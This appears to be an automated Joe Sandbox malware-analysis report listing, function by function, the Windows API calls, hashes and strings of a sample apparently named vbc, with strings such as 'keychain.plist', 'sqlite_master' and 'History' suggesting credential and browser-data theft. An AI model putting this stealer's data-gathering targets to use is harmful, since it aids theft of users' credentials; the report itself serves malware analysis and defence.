• Instruction Fuzzy Hash: EC11FAB5900208AFDB00DFA9D988AEEB7FCFB49304F10406AE515E7240D738DB45CB64
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpy$memset
• String ID: sqlite_master
• API String ID: 438689982-3163232059
• Opcode ID: c646f38e99a0b25c0d94209a59a7168cae4c1a9a59a360b2711f92080c37e354
• Instruction ID: df29f02e372fce164f73cef38905b10b73feda933693282389fd2907aeed520f
• Opcode Fuzzy Hash: c646f38e99a0b25c0d94209a59a7168cae4c1a9a59a360b2711f92080c37e354
• Instruction Fuzzy Hash: 8B01F572900618BAEB11BBA0CC42FDEB77DFF45315F50005AF60062042DB79AA148B98
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
  • Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
  • Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419
• _snwprintf.MSVCRT ref: 0040E81D
• SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040E882
  • Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
  • Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
  • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
• _snwprintf.MSVCRT ref: 0040E848
• wcscat.MSVCRT ref: 0040E85B
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
• String ID:
• API String ID: 822687973-0
• Opcode ID: f595f7851fd5ecf50e789f2e31413ad2f48e9a2df967e8378ccfd76600fbb0fc
• Instruction ID: fc9a9cbfa579f1f3c21001c0e8c570231a458ca756af8d40dec707b0d2905b79
• Opcode Fuzzy Hash: f595f7851fd5ecf50e789f2e31413ad2f48e9a2df967e8378ccfd76600fbb0fc
• Instruction Fuzzy Hash: 540188B650070466F720F7A6DC86FAB73ACDB80704F14047AB719F21C2D679A9514A6D
Uniqueness
Uniqueness Score: -1.00%

APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,73B75970,?,00416E7A,?), ref: 00416D6D
• malloc.MSVCRT ref: 00416D74
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,73B75970,?,00416E7A,?), ref: 00416D93
• free.MSVCRT(00000000,?,73B75970,?,00416E7A,?), ref: 00416D9A
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID:
• API String ID: 2605342592-0
• Opcode ID: 6473b6ae2363bac8fe3278054bbb67e2d8efa675f45e1cfdc60fa0bc066547d8
• Instruction ID: bcab52b9ccbc4c9bc02d63d2584d5636d902a6cb4a382b6ea3df8204de1a5a00
• Opcode Fuzzy Hash: 6473b6ae2363bac8fe3278054bbb67e2d8efa675f45e1cfdc60fa0bc066547d8
• Instruction Fuzzy Hash: 9DF089B260E22D7F7B102A75ACC0D7BBB9CDB862FDB21072FF514A1190D9199C015675
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32 ref: 004081F8
• SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00408210
• SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00408226
• SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00408249
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: MessageSend$Item
• String ID:
• API String ID: 3888421826-0
• Opcode ID: 381a5bbb51054e29776615c9d78b7fadc6b93f74ad2d14be58dfbd0a9df3dec6
• Instruction ID: eb915db23c4b1ca38ea3c1988d88bb83aba39799d6a265b66449fd7df9afb7a9
• Opcode Fuzzy Hash: 381a5bbb51054e29776615c9d78b7fadc6b93f74ad2d14be58dfbd0a9df3dec6
• Instruction Fuzzy Hash: 10F06975A0050CBFDB018F948E81CAFBBB9EB49784B2000BAF504E6150D6709E01AA61
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00417496
• UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 004174B6
• LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 004174C2
• GetLastError.KERNEL32 ref: 004174D0
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: File$ErrorLastLockUnlockmemset
• String ID:
• API String ID: 3727323765-0
• Opcode ID: 4810f114b558b10b38af4f71b0c7c6b165b1adf4af59189c3dccd4a982aa45c9
• Instruction ID: 68256e963451342af1775745e88af25fe573ff9f394a0ba2c0bbd214266e5fb2
• Opcode Fuzzy Hash: 4810f114b558b10b38af4f71b0c7c6b165b1adf4af59189c3dccd4a982aa45c9
• Instruction Fuzzy Hash: 7701F435504608BFDB219FA0DC84D9B7FBCFB80705F20843AF942D6050D6349984CB74
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00401C64
  • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
• wcslen.MSVCRT ref: 00401C7D
• wcslen.MSVCRT ref: 00401C8B
  • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
  • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: wcslen$FolderPathSpecialmemsetwcscatwcscpy
• String ID: Apple Computer\Preferences\keychain.plist
• API String ID: 3183857889-296063946
• Opcode ID: 6247019291f7f29928cfc72ffb34b103c0827717099c0caebcdb4204c0bdf711
• Instruction ID: eecd7d3c3de4f02ea7dbe6204318003872b6068ab845989257e2c34d03a92ed5
• Opcode Fuzzy Hash: 6247019291f7f29928cfc72ffb34b103c0827717099c0caebcdb4204c0bdf711
• Instruction Fuzzy Hash: 08F0F9B250531866FB20A755DC8AFDA73AC9F01314F2001B7E914E20C3FB7CD944469D
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040CF1E
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,00445ADC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040CF37
• strlen.MSVCRT ref: 0040CF49
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040CF5A
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
• Opcode ID: 6de95bbd86e8c5c66f1a6cb16b855a894458dc702525011a0bbc2a07e71c4aeb
• Instruction ID: 14800c8a4aa59548f5ab429dc5ca7c2185fd5422b2c87da3b8dfa48c6c6ad4f5
• Opcode Fuzzy Hash: 6de95bbd86e8c5c66f1a6cb16b855a894458dc702525011a0bbc2a07e71c4aeb
• Instruction Fuzzy Hash: 13F01DB780122CBFFB059B94DCC9EEB776CDB09254F0001A6B709E2052DA749E448BB8
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040CEAF
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040CECC
                                                                                                                                                                        • strlen.MSVCRT ref: 0040CEDE
                                                                                                                                                                        • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040CEEF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2754987064-0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040840D: memset.MSVCRT ref: 0040842C
  • Part of subcall function 0040840D: GetClassNameW.USER32 ref: 00408443
  • Part of subcall function 0040840D: _wcsicmp.MSVCRT ref: 00408455
• SetBkMode.GDI32(?,00000001), ref: 00413A7C
• SetBkColor.GDI32(?,00FFFFFF), ref: 00413A8A
• SetTextColor.GDI32(?,00C00000), ref: 00413A98
• GetStockObject.GDI32(00000000), ref: 00413AA0
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
• String ID:
• API String ID: 764393265-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00408D2C
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 00408D3C
• SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00408D4B
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Time$System$File$LocalSpecific
• String ID:
• API String ID: 979780441-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpy$DialogHandleModuleParam
• String ID:
• API String ID: 1386444988-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32 ref: 00404C44
  • Part of subcall function 0041473D: LoadLibraryW.KERNEL32(shlwapi.dll,745D48C0,?,00404C4C,00000000), ref: 00414746
  • Part of subcall function 0041473D: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00414754
  • Part of subcall function 0041473D: FreeLibrary.KERNEL32(00000000,?,00404C4C,00000000), ref: 0041476C
• GetDlgItem.USER32 ref: 00404C56
• GetDlgItem.USER32 ref: 00404C68
• GetDlgItem.USER32 ref: 00404C7A
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Item$Library$AddressFreeLoadProc
• String ID:
• API String ID: 2406072140-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• wcschr.MSVCRT ref: 0040CFDA
• wcschr.MSVCRT ref: 0040CFE8
  • Part of subcall function 00408FA6: wcslen.MSVCRT ref: 00408FC2
  • Part of subcall function 00408FA6: memcpy.MSVCRT ref: 00408FE5
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: wcschr$memcpywcslen
• String ID: "
• API String ID: 1983396471-123907689
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpywcschr
• String ID: ZD
• API String ID: 2424118378-3587482827
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004089BB: SetFilePointer.KERNEL32(0040A46B,?,00000000,00000000,?,0040A271,00000000,00000000,?,00000020,?,0040A401,?,?,*.*,0040A46B), ref: 004089C8
• _memicmp.MSVCRT ref: 0040A1B9
• memcpy.MSVCRT ref: 0040A1D0
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FilePointer_memicmpmemcpy
• String ID: URL
• API String ID: 2108176848-3574463123
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: _snwprintfmemcpy
• String ID: %2.2X
• API String ID: 2789212964-323797159
                                                                                                                                                                        • Opcode ID: d16808a51bbc7474834844d6a398450cf8754e6776392b16b10eb0a45586ee87
                                                                                                                                                                        • Instruction ID: da81b6977c0b6fb050ee50f61be4767a81b1db5370a865e3ffb8ab5306406039
                                                                                                                                                                        • Opcode Fuzzy Hash: d16808a51bbc7474834844d6a398450cf8754e6776392b16b10eb0a45586ee87
                                                                                                                                                                        • Instruction Fuzzy Hash: D311A132A00208BFEB40DFE8C986AAF73B8FB45714F10843BED55E7141D6789A558F95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,004176FC,?,00000000), ref: 00417518
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00417524
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseFileHandleUnmapView
                                                                                                                                                                        • String ID: NA
                                                                                                                                                                        • API String ID: 2381555830-2562218444
                                                                                                                                                                        • Opcode ID: d40bf1f6c7c19c9d983791adfa5e9ad4e6f6ebbcc0410757e5a5cd4d668ca904
                                                                                                                                                                        • Instruction ID: 5a1a322b0db6f4624e604a7b594929ce6c45ce98bd99ef11bc86fd7bf5bcef0d
                                                                                                                                                                        • Opcode Fuzzy Hash: d40bf1f6c7c19c9d983791adfa5e9ad4e6f6ebbcc0410757e5a5cd4d668ca904
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D11BF36504B10EFC7329F28D944A9777F5FF40752B40092EE94296A61D738F981CB58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 0040AE7C
                                                                                                                                                                          • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
                                                                                                                                                                          • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
                                                                                                                                                                          • Part of subcall function 00409064: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401DEE,00000000,00000001,00000000), ref: 0040907D
                                                                                                                                                                          • Part of subcall function 00409064: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401DEE,00000000,00000001,00000000), ref: 004090A2
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,000000FF,00000000), ref: 0040AECC
                                                                                                                                                                          • Part of subcall function 00409552: ??3@YAXPAX@Z.MSVCRT ref: 00409559
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                        • String ID: {@
                                                                                                                                                                        • API String ID: 2445788494-1579578673
                                                                                                                                                                        • Opcode ID: c255d9c27d1defa37b3e30fcff96da51efc1fad4c64b69bf173537adafc66d1e
                                                                                                                                                                        • Instruction ID: c5e992bc26eaba96ccce0a59eaf6c8ec24c3530ff69697df2342695e73c728e4
                                                                                                                                                                        • Opcode Fuzzy Hash: c255d9c27d1defa37b3e30fcff96da51efc1fad4c64b69bf173537adafc66d1e
                                                                                                                                                                        • Instruction Fuzzy Hash: A1113376804208AFCB01AF69DC45CDA7B78EE05364751C27BF515A7192D6349E04CBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _snwprintf
                                                                                                                                                                        • String ID: %%-%d.%ds
                                                                                                                                                                        • API String ID: 3988819677-2008345750
                                                                                                                                                                        • Opcode ID: 483dcaac6a08b5d03ce4074c4c19aa481c1388c04e02163b2fa0e4fc7d7ec376
                                                                                                                                                                        • Instruction ID: fa2a5c48b8b1081f9110b67312fe06c807ccf1e61c825d072a06322f14435401
                                                                                                                                                                        • Opcode Fuzzy Hash: 483dcaac6a08b5d03ce4074c4c19aa481c1388c04e02163b2fa0e4fc7d7ec376
                                                                                                                                                                        • Instruction Fuzzy Hash: 2D01B171600304AFD711EF69CC82E5ABBA9FF8C714B10442EFD46A7292C679F851CB64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileNameSavewcscpy
                                                                                                                                                                        • String ID: X
                                                                                                                                                                        • API String ID: 3080202770-3081909835
                                                                                                                                                                        • Opcode ID: ebc7cc994b1ae799fe580d521e5066964324ca7fbd572096a573d52571a50e6b
                                                                                                                                                                        • Instruction ID: 302039dcaac94884f1c4397820c578514485f3c1708042d42c96f5da00a98a83
                                                                                                                                                                        • Opcode Fuzzy Hash: ebc7cc994b1ae799fe580d521e5066964324ca7fbd572096a573d52571a50e6b
                                                                                                                                                                        • Instruction Fuzzy Hash: 3301D3B1E002499FDF01DFE9D9847AEBBF4AB08319F10402EE855E6280DB789949CF55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memicmpwcslen
                                                                                                                                                                        • String ID: History
                                                                                                                                                                        • API String ID: 1872909662-3892791767
                                                                                                                                                                        • Opcode ID: e276876a3a660070092f4bdc0da4bda60b27ab1e2c5d0f7fe8a34c2cfdf5cdf0
                                                                                                                                                                        • Instruction ID: 6d3e5e79fb5ba3dc045185e0f7d8bb4044f56437cf7f7bc11c2c4fdfd27bba80
                                                                                                                                                                        • Opcode Fuzzy Hash: e276876a3a660070092f4bdc0da4bda60b27ab1e2c5d0f7fe8a34c2cfdf5cdf0
                                                                                                                                                                        • Instruction Fuzzy Hash: D1F0A4721086019BD210EA298841A6BF7E8DB923A8F11053FF89192283DB3DDC5586A9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040BFA6
                                                                                                                                                                        • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040BFD5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSendmemset
                                                                                                                                                                        • String ID: "
                                                                                                                                                                        • API String ID: 568519121-123907689
                                                                                                                                                                        • Opcode ID: 8974f3925887516f6d0a900228c109d4e68bc67ff3c39d3e2085c907346f7644
                                                                                                                                                                        • Instruction ID: 52ec7358bf223f21f0f54ed804b07356b6d9a4f052c0f3137058475af9765f6b
                                                                                                                                                                        • Opcode Fuzzy Hash: 8974f3925887516f6d0a900228c109d4e68bc67ff3c39d3e2085c907346f7644
                                                                                                                                                                        • Instruction Fuzzy Hash: 66016D75900206ABDB209F5ACC45EAFB7F8FF85745F00802AE855E7281E7349945CF79
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowPlacement.USER32(?,?,?,?,?,0040F3B0,?,General,?,?,?,?,?,00000000,00000001), ref: 0040191D
                                                                                                                                                                        • memset.MSVCRT ref: 00401930
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PlacementWindowmemset
                                                                                                                                                                        • String ID: WinPos
                                                                                                                                                                        • API String ID: 4036792311-2823255486
                                                                                                                                                                        • Opcode ID: 531d41ac9e6cbf47dd5b0ef28c7d94a06efd8350b381f438b609c2e10ada3800
                                                                                                                                                                        • Instruction ID: ca976ba5ed3f83ef93de4c78b9b818d0dc8f3eea61e23acacabb71661926745e
                                                                                                                                                                        • Opcode Fuzzy Hash: 531d41ac9e6cbf47dd5b0ef28c7d94a06efd8350b381f438b609c2e10ada3800
                                                                                                                                                                        • Instruction Fuzzy Hash: 9AF012B0600205EFEB14DF95D899F5A77A8EF04700F54017AF90ADB2D1DBB89900CB69
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040BC4D
• LoadStringW.USER32(X1E,00000000,?,00001000), ref: 0040BC65
  • Part of subcall function 0040B93B: memset.MSVCRT ref: 0040B94E
  • Part of subcall function 0040B93B: _itow.MSVCRT ref: 0040B95C
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$LoadString_itow
• String ID: X1E
• API String ID: 2363904170-1560614071
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040B94E
• _itow.MSVCRT ref: 0040B95C
  • Part of subcall function 0040B8C2: memset.MSVCRT ref: 0040B8E7
  • Part of subcall function 0040B8C2: GetPrivateProfileStringW.KERNEL32 ref: 0040B90F
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$PrivateProfileString_itow
• String ID: X1E
• API String ID: 1482724422-1560614071
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D
• wcsrchr.MSVCRT ref: 0040BE92
• wcscat.MSVCRT ref: 0040BEA8
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FileModuleNamewcscatwcsrchr
• String ID: _lng.ini
• API String ID: 383090722-1948609170
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpy$memset
• String ID:
• API String ID: 438689982-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• wcslen.MSVCRT ref: 00408DD7
  • Part of subcall function 004080AC: malloc.MSVCRT ref: 004080C8
  • Part of subcall function 004080AC: memcpy.MSVCRT ref: 004080E0
  • Part of subcall function 004080AC: free.MSVCRT(00000000,00000000,?,00408F0C,00000002,?,00000000,?,0040923F,00000000,?,00000000), ref: 004080E9
• free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408DFD
• free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408E20
• memcpy.MSVCRT ref: 00408E44
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: free$memcpy$mallocwcslen
• String ID:
• API String ID: 726966127-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00417A93,000000FF,00000000,00000000,0041767E,?,?,0041767E,00417A93,00000000,?,00417D00,?,00000000), ref: 00416D1A
• malloc.MSVCRT ref: 00416D22
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00417A93,000000FF,00000000,00000000,?,0041767E,00417A93,00000000,?,00417D00,?,00000000,00000000,?), ref: 00416D39
• free.MSVCRT(00000000,?,0041767E,00417A93,00000000,?,00417D00,?,00000000,00000000,?), ref: 00416D40
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID:
• API String ID: 2605342592-0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (image; legend: Executed / Not Executed)
• Function 4073b6-4074ff, calls: memset * 4, GetComputerNameA, GetUserNameA, MultiByteToWideChar * 2, strlen * 2, memcpy
C-Code - Quality: 100%
E004073B6(signed int _a4) {
	char _v5;
	char _v6;
	char _v7;
